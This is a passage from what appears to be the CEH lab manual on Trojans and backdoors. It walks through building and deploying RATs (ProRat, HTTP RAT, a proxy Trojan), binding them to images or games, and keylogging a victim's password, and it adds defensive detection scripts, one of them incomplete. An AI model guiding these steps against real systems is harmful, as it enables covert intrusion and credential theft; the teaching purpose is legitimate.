
CEH Lab Manual

Trojans and Backdoors
Module 06

Module 06 - Trojans and Backdoors

Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
According to Bank Info Security News (http://www.bankinfosecurity.com), Trojans pose serious risks for any personal and sensitive information stored on compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which in an open environment are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud. According to cyber security experts, the banking Trojan known as Citadel, an advanced variant of Zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created this Trojan specifically for financial fraud and sold it on the black market. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing a network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this, you need:
■ A computer running Windows Server 2008 as Guest-1 in virtual machine
■ Windows 7 running as Guest-2 in virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools

CEH Lab Manual Page 425

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.


Lab Duration
Time: 40 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard disk. With the help of a Trojan, an attacker gets access to stored passwords in a computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.

Lab Tasks
TASK 1: Overview

Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you with Trojans and backdoors:
■ Creating a Server Using the ProRat Tool
■ Wrapping a Trojan Using One File EXE Maker
■ Proxy Server Trojan
■ HTTP Trojan
■ Remote Access Trojans Using Atelier Web Remote Commander
■ Detecting Trojans
■ Creating a Server Using the Theef
■ Creating a Server Using the Biodox
■ Creating a Server Using the MoSucker
■ Hack Windows 7 using Metasploit

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Lab

Creating a Server Using the ProRat Tool
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
As more and more people regularly use the Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hackers are using malware to steal personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that they can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking. Some hackers may take control of your and many other machines to conduct a denial-of-service attack against high-profile web servers such as banks and credit card gateways, which makes the target computers unavailable for normal business. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry this out, you need:
■ The ProRat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat
■ A computer running Windows Server 2012 as Host Machine
■ A computer running Windows 8 (Virtual Machine)
■ Windows Server 2008 running in Virtual Machine
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with ProRat

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

2. Double-click ProRat.exe in Windows 8 Virtual Machine.

3. Click Create ProRat Server to start preparing to create a server.


FIGURE 1.1: ProRat main window

4. The Create Server window appears.

Note: Password button: retrieves passwords from many services, such as POP3 accounts, messenger, IE, mail, etc.

FIGURE 1.2: ProRat Create Server window

5. Click General Settings to change features such as Server Port, Server Password, Victim Name, and the port number you wish to connect over for the connection you have to the victim, or leave the settings at their defaults.

6. Uncheck the highlighted options as shown in the following screenshot.


FIGURE 1.3: ProRat Create Server - General Settings

Note: You can use Dynamic DNS to connect over the Internet by using no-ip account registration.

7. Click Bind with File to bind the server with a file; in this lab we are using a .jpg file to bind the server.

8. Check Bind server with a file.

9. Click Select File, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\Images. Select the Girl.jpg file to bind with the server.

Note: Clipboard: to read data from random access memory.

FIGURE 1.4: ProRat binding with a file


10. Select Girl.jpg in the window and then click Open to bind the file.

Note: VNC Trojan starts a VNC server daemon in the infected system.

FIGURE 1.5: ProRat binding an image

11. Click OK after selecting the image for binding with the server.

Note: File manager: to manage the victim directory for add, delete, and modify.

12. In Server Extensions settings, select EXE (Has icon support) in the Select Server Extension options.


Note: Give Damage: to format the entire system files.

FIGURE 1.7: ProRat Server Extensions settings

13. In Server Icon select any of the icons, and click the Create Server button at the bottom right side of the ProRat window.

Note: It connects to the victim using any VNC viewer with the password “secret.”

FIGURE 1.8: ProRat creating a server

14. Click OK after the server has been prepared, as shown in the following screenshot.


FIGURE 1.9: ProRat server created in the current directory

15. Now you can send the server file by mail or any communication media to the victim’s machine as, for example, a celebration file to run.

Note: SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it turns a computer into an invisible web server.

FIGURE 1.10: ProRat Create Server (Explorer view of the ProRat folder showing the created server file)
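The server produced in steps 7 to 15 is a stub executable with Girl.jpg bound to it. As an added defensive check that is not part of this lab manual or of ProRat, the following Python script (standard library only) reads a PE file's headers, works out where the last section ends, and reports any trailing data (the "overlay") that binders commonly use to carry the decoy and the payload; it also sniffs the overlay's first bytes so a JPEG glued onto the end of an EXE stands out. The `build_stub_pe` helper constructs a minimal, non-runnable PE image purely as a test fixture. Not every wrapper uses an overlay (some embed payloads as resources or extra sections), and an Authenticode signature legitimately lives in the overlay, so the script subtracts a declared certificate table and should be treated as one signal, not proof.

```python
import struct

# Magic bytes used to label what was appended (constructed list for this example).
OVERLAY_MAGICS = [
    (b"MZ", "executable"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG", "png"),
    (b"PK\x03\x04", "zip"),
]


def sniff(chunk: bytes) -> str:
    """Label a byte chunk by its leading magic bytes."""
    for magic, kind in OVERLAY_MAGICS:
        if chunk.startswith(magic):
            return kind
    return "unknown"


def pe_overlay(data: bytes) -> dict:
    """Return where the PE image declares it ends and how much data follows it.

    declared_end  = highest PointerToRawData + SizeOfRawData over all sections
    overlay_size  = bytes after declared_end, minus a declared Authenticode table
    overlay_kind  = label of the overlay's first bytes ("none" if no overlay)
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")

    # IMAGE_FILE_HEADER starts right after the 4-byte signature.
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_hdr_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_hdr = e_lfanew + 24
    sect_table = opt_hdr + opt_hdr_size

    # The headers themselves count as declared content even with no sections.
    declared_end = sect_table + num_sections * 40
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_table + i * 40 + 16)
        declared_end = max(declared_end, raw_ptr + raw_size)

    # An Authenticode signature is stored after the sections and is declared in
    # the Security data directory (index 4); it is not a binder artifact.
    magic = struct.unpack_from("<H", data, opt_hdr)[0]
    dir_base = 96 if magic == 0x10B else 112            # PE32 vs PE32+
    cert_off = cert_size = 0
    if opt_hdr_size >= dir_base + 5 * 8:
        cert_off, cert_size = struct.unpack_from("<II", data, opt_hdr + dir_base + 4 * 8)

    overlay_size = len(data) - declared_end
    if cert_size and cert_off >= declared_end:
        overlay_size -= cert_size
    kind = "none" if overlay_size <= 0 else sniff(data[declared_end:declared_end + 8])
    return {"declared_end": declared_end, "overlay_size": max(overlay_size, 0), "overlay_kind": kind}


def build_stub_pe(section_data: bytes) -> bytes:
    """Construct a minimal, non-runnable PE32 image with one section (test fixture only)."""
    e_lfanew = 0x40
    opt_size = 224                                       # standard PE32 optional header size
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    raw_ptr = 0x200                                      # first section starts at a 512-byte boundary
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(section_data), 0x1000, len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = dos + b"PE\0\0" + file_hdr + opt_hdr + section
    return image + b"\0" * (raw_ptr - len(image)) + section_data


if __name__ == "__main__":
    clean = build_stub_pe(b"\x90" * 16)
    bound = clean + b"\xff\xd8\xff\xe0" + b"\0" * 100   # constructed: a JPEG glued onto the stub
    for label, sample in (("clean stub", clean), ("stub with bound image", bound)):
        print(label, pe_overlay(sample))
```

To check a real file, read it with `open(path, "rb").read()` and pass the bytes to `pe_overlay`; a non-zero `overlay_size` whose first bytes sniff as an image or another executable is the pattern a binder leaves behind, whereas a few bytes of zero padding after the last section are usually just file alignment.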

16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

17. Double-click binder_server.exe as shown in the following screenshot.


FIGURE 1.11: ProRat folder on Windows Server 2008

Note: ICMP Trojan: covert channels are methods by which an attacker can hide data in a protocol in a way that is undetectable.

18. Now switch to Windows 8 Virtual Machine, enter the IP address of Windows Server 2008 and the default port number in the ProRat main window, and click Connect.

19. In this lab, the IP address of Windows Server 2008 is 10.0.0.13.

Note: IP addresses might differ in classroom labs.

FIGURE 1.12: ProRat connecting to the infected server

20. Enter the password you provided at the time of creating the server and click OK.


FIGURE 1.13: ProRat connection window

21. Now you are connected to the victim machine. To test the connection, click PC Info and choose System Information as in the following figure.

Note: Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol.

FIGURE 1.14: ProRat connected computer window (PC Information received: Computer Name WIN-EGBHISG14L0, User Name Administrator, Windows Language English (United States), Windows Path C:\Windows, System Path C:\Windows\system32, Temp Path C:\Users\ADMINI~1\, Workgroup NO, Date 9/23/2012)

22. Now click KeyLogger to steal user passwords for the online system.

TASK 2: Attack System Using Keylogger

FIGURE 1.15: ProRat KeyLogger button


23. The KeyLogger window will appear.

Note: This Trojan works like remote desktop access. The hacker gains complete GUI access to the remote system:
■ Infect the victim’s computer with server.exe and plant a Reverse Connecting Trojan.
■ The Trojan connects from the victim’s port to the attacker, establishing a reverse connection.
■ The attacker then has complete control over the victim’s machine.

FIGURE 1.16: ProRat KeyLogger window

24. Now switch to the Windows Server 2008 machine and open a browser or Notepad and type any text.

Text typed in Notepad: Hi there This is my username: xyz@yahoo.com password: test<3@#S!@l

Note: Banking Trojans are programs that steal data from infected computers via web browsers and protected storage.

FIGURE 1.17: Text typed in Windows Server 2008 Notepad

25. While the victim is writing a message or entering a user name and password, you can capture the log entry.

26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates from the victim machine.


KeyLog received: 9/23/2012 11:55:28 PM hi bob this is my username;xyzatyahoo.com password; testshift1buttonwith1 shiftbuttonwith2

FIGURE 1.18: ProRat KeyLogger window (Read Log, Delete Log, Save as, Clear Screen)

27. Now you can use a lot of features from ProRat on the victim’s machine.

Note: ProRat KeyLogger will not read special characters.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Create a server with advanced options such as Kill AV-FW on start, Disable Windows XP Firewall, etc., send it and connect it to the victim machine, and verify whether you can communicate with the victim machine.

2. Evaluate and examine various methods to connect to victims if they are in other cities or countries.


Tool/Utility: ProRat Tool

Information Collected/Objectives Achieved: Successful creation of binded server.exe

Output: PC Information
■ Computer Name: WIN-EGBHISG14L0
■ User Name: Administrator
■ Windows Ver:
■ Windows Language: English (United States)
■ Windows Path: c:\windows
■ System Path: c:\windows\system32
■ Temp Path: c:\Users\ADMINI~1\
■ Product ID:
■ Workgroup: NO
■ Date: 9/23/2012

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Lab

Wrapping a Trojan Using One File EXE Maker
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Sometimes an attacker makes a very secure backdoor, even safer than the normal way to get into a system. A normal user may use only one password for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging in. After getting control of the victim system, the attacker installs a backdoor on the victim system to keep his or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a backdoor is using ActiveX. Whenever a user visits a website, embedded ActiveX could run on the system. Most websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. In order to protect your system from attacks by Trojans, you need extensive knowledge of creating Trojans and backdoors and of protecting the system from attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Wrapping a Trojan with a game in Windows Server 2008
■ Running the Trojan to access the game on the front end
■ Analyzing the Trojan running in the backend

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this, you need:
■ OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in virtual machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
TASK 1

1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.
FIGURE 3.1: OneFile EXE Maker home screen (Senna Spy One EXE Maker 2000 - 2.0a; joins many files into a single EXE with Open Mode, Copy To and Action options per file)


2. Click the Add File button and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add the Lazaris.exe file.

Note: You can set various tool options such as Open mode, Copy to, and Action.

FIGURE 3.2: Adding Lazaris game

3. Click Add File and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add the mcafee.exe file.

FIGURE 3.3: Adding MCAFEE.EXE proxy server

4. Select Mcafee and type 8080 in the Command Line Parameters field.


FIGURE 3.4: Assigning port 8080 to MCAFEE

5. Select Lazaris and check the Normal option in Open Mode.
FIGURE 3.5: Setting Lazaris open mode

6. Click Save and browse to save the file on the desktop, and name the file Tetris.exe.


FIGURE 3.6: Trojan created; MCAFEE.EXE will run in the background

7. Now double-click to open the Tetris.exe file. This will launch the Lazaris game on the front end.

FIGURE 3.7: Lazaris game

8. Now open Task Manager and click the Processes tab to check if McAfee is running.


FIGURE 3.8: MCAFEE in Task Manager (the Processes tab lists both LAZARIS.EXE and MCAFEE.EXE running under the Administrator account)

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: EXE Maker

Information Collected/Objectives Achieved: Output: Using a backdoor, execute Tetris.exe

Questions
1. Use the various other options in the Open mode, Copy to, and Action sections of OneFileEXEMaker and analyze the results.
2. How will you secure your computer from OneFileEXEMaker attacks?


Internet Connection Required: No
Platform Supported: Classroom, iLabs


Proxy Server Trojan
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
■ Starting McAfee Proxy
■ Accessing the Internet using McAfee Proxy


Lab Environment
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

To carry out this, you need:
■ McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes


Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
1. In the Windows Server 2008 virtual machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types, right-click Proxy Server Trojans and select CmdHere from the context menu.
[Figure: Windows Explorer on Windows Server 2008 showing the Trojans Types folder with the context menu of Proxy Server Trojans open and CmdHere highlighted]

FIGURE 4.1: Windows Server 2008: CmdHere

2. Now type the command dir to check the folder contents.

FIGURE 4.2: Directory listing of Proxy Server folder

3. The following image lists the directories and files in the folder.


[Figure: command prompt showing the dir output of Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans, which lists mcafee.exe (5,328 bytes) and a "W3bPr0xy Tr0j4n Cr34t0r <Funny Name>" directory]

FIGURE 4.3: Contents in Proxy Server folder

4. Type the command mcafee 8080 to run the service in Windows Server 2008.

FIGURE 4.4: Starting mcafee tool on port 8080

5. The service has started on port 8080.
6. Now go to the Windows Server 2012 host machine and configure the web browser to access the Internet on port 8080.
7. In this lab launch Chrome, and select Settings as shown in the following figure.
Note: This process can be carried out in any browser after setting the LAN settings for the respective browser.

[Figure: Google Chrome on Windows Server 2012 with the browser menu open and Settings selected]

FIGURE 4.5: Internet option of a browser in Windows Server 2012


8. Click the Show advanced settings link to view the Internet settings.

FIGURE 4.6: Advanced Settings of Chrome Browser

9. In Network Settings, click Change proxy settings.
[Figure: Chrome Settings page (chrome://settings) with advanced settings expanded; Network section: "Google Chrome is using your computer's system proxy settings to connect to the network", with the Change proxy settings... button]

FIGURE 4.7: Changing proxy settings of Chrome Browser

10. In the Internet Properties window, click LAN settings to configure proxy settings.


[Figure: Internet Properties dialog, Connections tab: Dial-up and Virtual Private Network settings (Setup), "Never dial a connection" selected, and the Local Area Network (LAN) settings section with the LAN settings button]

FIGURE 4.8: LAN Settings of a Chrome Browser

11. In the Local Area Network (LAN) Settings window, select the Use a proxy server for your LAN option in the Proxy server section.
12. Enter the IP address of Windows Server 2008, set the port number to 8080, and click OK.
[Figure: Local Area Network (LAN) Settings dialog: Automatically detect settings checked; Proxy server: "Use a proxy server for your LAN" checked, Address 10.0.0.13, Port 8080, Advanced, "Bypass proxy server for local addresses"; OK / Cancel]

FIGURE 4.9: Proxy settings of LAN in Chrome Browser

13. Now access any web page in the browser (example: www.bbc.co.uk).


FIGURE 4.10: Accessing web page using proxy server

14. The web page will open.
15. Now go back to Windows Server 2008 and check the command prompt.
[Figure: command prompt "Administrator: C:\Windows\system32\cmd.exe - mcafee 8080" on Windows Server 2008, logging "Accepting New Requests!" and the proxied requests to www.google.com, www.bbc.co.uk and static.bbci.co.uk together with their HTTP status codes (200)]

Note: Accessing a web page using the proxy server.

FIGURE 4.11: Background information on Proxy server

16. You can see that we have accessed the Internet using the proxy server Trojan.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Proxy Server Trojan

Information Collected/Objectives Achieved: Output: Use the proxy server Trojan to access the Internet. Accessed web page: www.bbc.co.uk

Questions
1. Determine whether the McAfee HTTP Proxy Server Trojan supports ports other than 8080.
2. Evaluate the drawbacks of using the HTTP proxy server Trojan to access the Internet.

Internet Connection Required: Yes
Platform Supported: Classroom


HTTP Trojan
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Hackers have a variety of motives for installing malevolent software (malware). This type of software tends to yield instant access to the system in order to continuously steal various types of information from it, for example, a company's strategic designs or credit card numbers. A backdoor is a program or a set of related programs that a hacker installs on the victim computer to allow access to the system at a later time. A backdoor's goal is to remove the evidence of initial entry from the system's log. Hacker-dedicated websites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log in by entering a predefined password. You are a Security Administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ To run HTTP Trojan on Windows Server 2008
■ Access the Windows Server 2008 machine process list using the HTTP Proxy
■ Kill running processes on Windows Server 2008 Virtual Machine

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this, you need:


■ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer running Windows Server 2008 (host)
■ Windows 8 running in a virtual machine
■ Windows Server 2008 in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
HTTP RAT

1. Log in to the Windows 8 virtual machine, and open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
[Figure: Windows 8 Release Preview desktop (Evaluation copy, Build 8400) with the Mozilla Firefox and Google Chrome shortcuts]

FIGURE 5.1: Windows 8 Start menu

2. Click Services in the Start menu to launch Services.

[Figure: Windows 8 Start screen apps (Video, Mozilla Firefox, Google Chrome, Calendar, Desktop, Weather, services, Internet Explorer, Maps, Store, SkyDrive, ...)]

FIGURE 5.2: Windows 8 Start menu Apps

Note: Disabling/stopping the World Wide Web Publishing service is mandatory as HTTP RAT runs on port 80.

3. Disable/Stop World Wide Web Publishing Services.

[Figure: Services console (Local) with the World Wide Web Publishing Service selected; description "Provides Web connectivity and administration through the Internet Information Services Manager"]

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World Wide Web Publishing service and select Properties to disable the service.


[Figure: World Wide Web Publishing Service Properties (Local Computer), General tab: Service name W3SVC, Display name World Wide Web Publishing Service, Description "Provides Web connectivity and administration through the Internet Information Services Manager", Path to executable C:\Windows\system32\svchost.exe -k iissvcs, Startup type Disabled, Service status Stopped; Start / Stop / Pause / Resume; OK / Cancel / Apply]

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. Now start HTTP RAT from the location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.
Note: The send notification option can be used to send the details to your Mail ID.

[Figure: HTTP RAT 0.31 main window ("backdoor Webserver by z0mbie", latest version here: [http://freenet.am/~zombie]); settings: "send notification with ip address to mail", SMTP server for sending mail (several servers can be specified delimited with ;), your email address, "close FireWalls", server port: 80; Create / Exit buttons]

FIGURE 5.5: HTTP RAT main window

6. Disable the Send notification with ip address to mail option.
7. Click Create to create an httpserver.exe file.


[Figure: HTTP RAT 0.31 window with the "send notification with ip address to mail" option unchecked, server port 80, and the Create button highlighted]

FIGURE 5.6: Create backdoor

Note: The created httpserver will be placed in the tool directory.

[Figure: HTTP RAT 0.31 message box "done! send httpserver.exe 2 victim" with an OK button]

FIGURE 5.7: Backdoor server created successfully

8. The httpserver.exe file should now be created in the folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.
9. Double-click the file and click Run.


[Figure: Windows 8 File Explorer in the HTTP RAT TROJAN folder with the "Open File - Security Warning" dialog: "The publisher could not be verified. Are you sure you want to run this software?"; Name: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN\httpserver.exe, Publisher: Unknown Publisher, Type: Application; Run / Cancel; "This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust."]

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check if the process is running.
[Figure: Windows 8 Task Manager, Processes tab, with Httpserver (32 bit) listed under Background processes]

FIGURE 5.9: Backdoor running in task manager

11. Go to Windows Server 2008 and open a web browser to access the Windows 8 machine (here "10.0.0.12" is the IP address of the Windows 8 machine).


[Figure: z0mbie's HTTP_RAT web page opened in the browser on Windows Server 2008: "welcome 2 HTTP_RAT infected computer" with the links [running processes] [browse] [computer info] [stop httprat] [have suggestions?] [homepage]]

FIGURE 5.10: Access the backdoor in Host web browser

12. Click running processes to list the processes running on the Windows 8 machine.
[Figure: HTTP_RAT "running processes" page (http://10.0.0.12/proc) listing the Windows 8 processes (System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, spoolsv.exe, SearchIndexer.exe, httpserver.exe, firefox.exe, ...), each followed by a [kill] link]

FIGURE 5.11: Process list of the victim computer

13. You can kill any running processes from here.
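As an added example (not part of the CEH lab manual), the following Python script shows the defender's side of this lab and of the preceding Proxy Server Trojan lab: httpserver.exe listening on port 80 and mcafee.exe listening on port 8080 are each a listening TCP socket owned by an image that should not be serving that port. The script joins `netstat -ano` output to `tasklist /fo csv /nh` output by PID and flags every listener that does not match a per-port allow-list of expected images; the command outputs, PIDs and the allow-list below are constructed assumptions, not values from the lab.

```python
"""Flag unexpected listening TCP ports on a Windows host.

Added example, not from the lab manual: both the proxy server Trojan
(mcafee.exe on 8080) and HTTP RAT (httpserver.exe on 80) show up as a
listening socket owned by a process that has no business serving that port.
The two command outputs below are constructed samples in the real tools'
formats so that the script runs offline.
"""
import csv
import io
import re

# Constructed sample of `netstat -ano` (Windows). Only TCP LISTENING rows matter.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2840
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1180
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3124
  TCP    10.0.0.13:8080         10.0.0.11:49211        ESTABLISHED     3124
  TCP    [::]:135               [::]:0                 LISTENING       716
  UDP    0.0.0.0:123            *:*                                    1044
"""

# Constructed sample of `tasklist /fo csv /nh` (CSV without a header line).
TASKLIST_SAMPLE = '''"System","4","Services","0","24 K"
"svchost.exe","716","Services","0","9,120 K"
"svchost.exe","1180","Services","0","12,004 K"
"svchost.exe","1044","Services","0","6,112 K"
"httpserver.exe","2840","Console","1","1,512 K"
"mcafee.exe","3124","Console","1","1,320 K"
'''

# Assumed baseline: which image names may own a listener on each port.
# Any other image on these ports, or any listener on a port not listed
# here, is reported.
EXPECTED_LISTENERS = {
    80: {"svchost.exe"},     # IIS World Wide Web Publishing Service (W3SVC)
    135: {"svchost.exe"},    # RPC endpoint mapper
    445: {"System"},         # SMB
    3389: {"svchost.exe"},   # Remote Desktop
}

NETSTAT_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_text):
    """Return [(port, pid)] for every TCP LISTENING row of netstat -ano output."""
    listeners = []
    for line in netstat_text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            listeners.append((int(m.group(2)), int(m.group(3))))
    return listeners


def parse_tasklist(tasklist_text):
    """Return {pid: image_name} from tasklist /fo csv /nh output."""
    pid_to_image = {}
    for row in csv.reader(io.StringIO(tasklist_text)):
        if len(row) >= 2:
            pid_to_image[int(row[1])] = row[0]
    return pid_to_image


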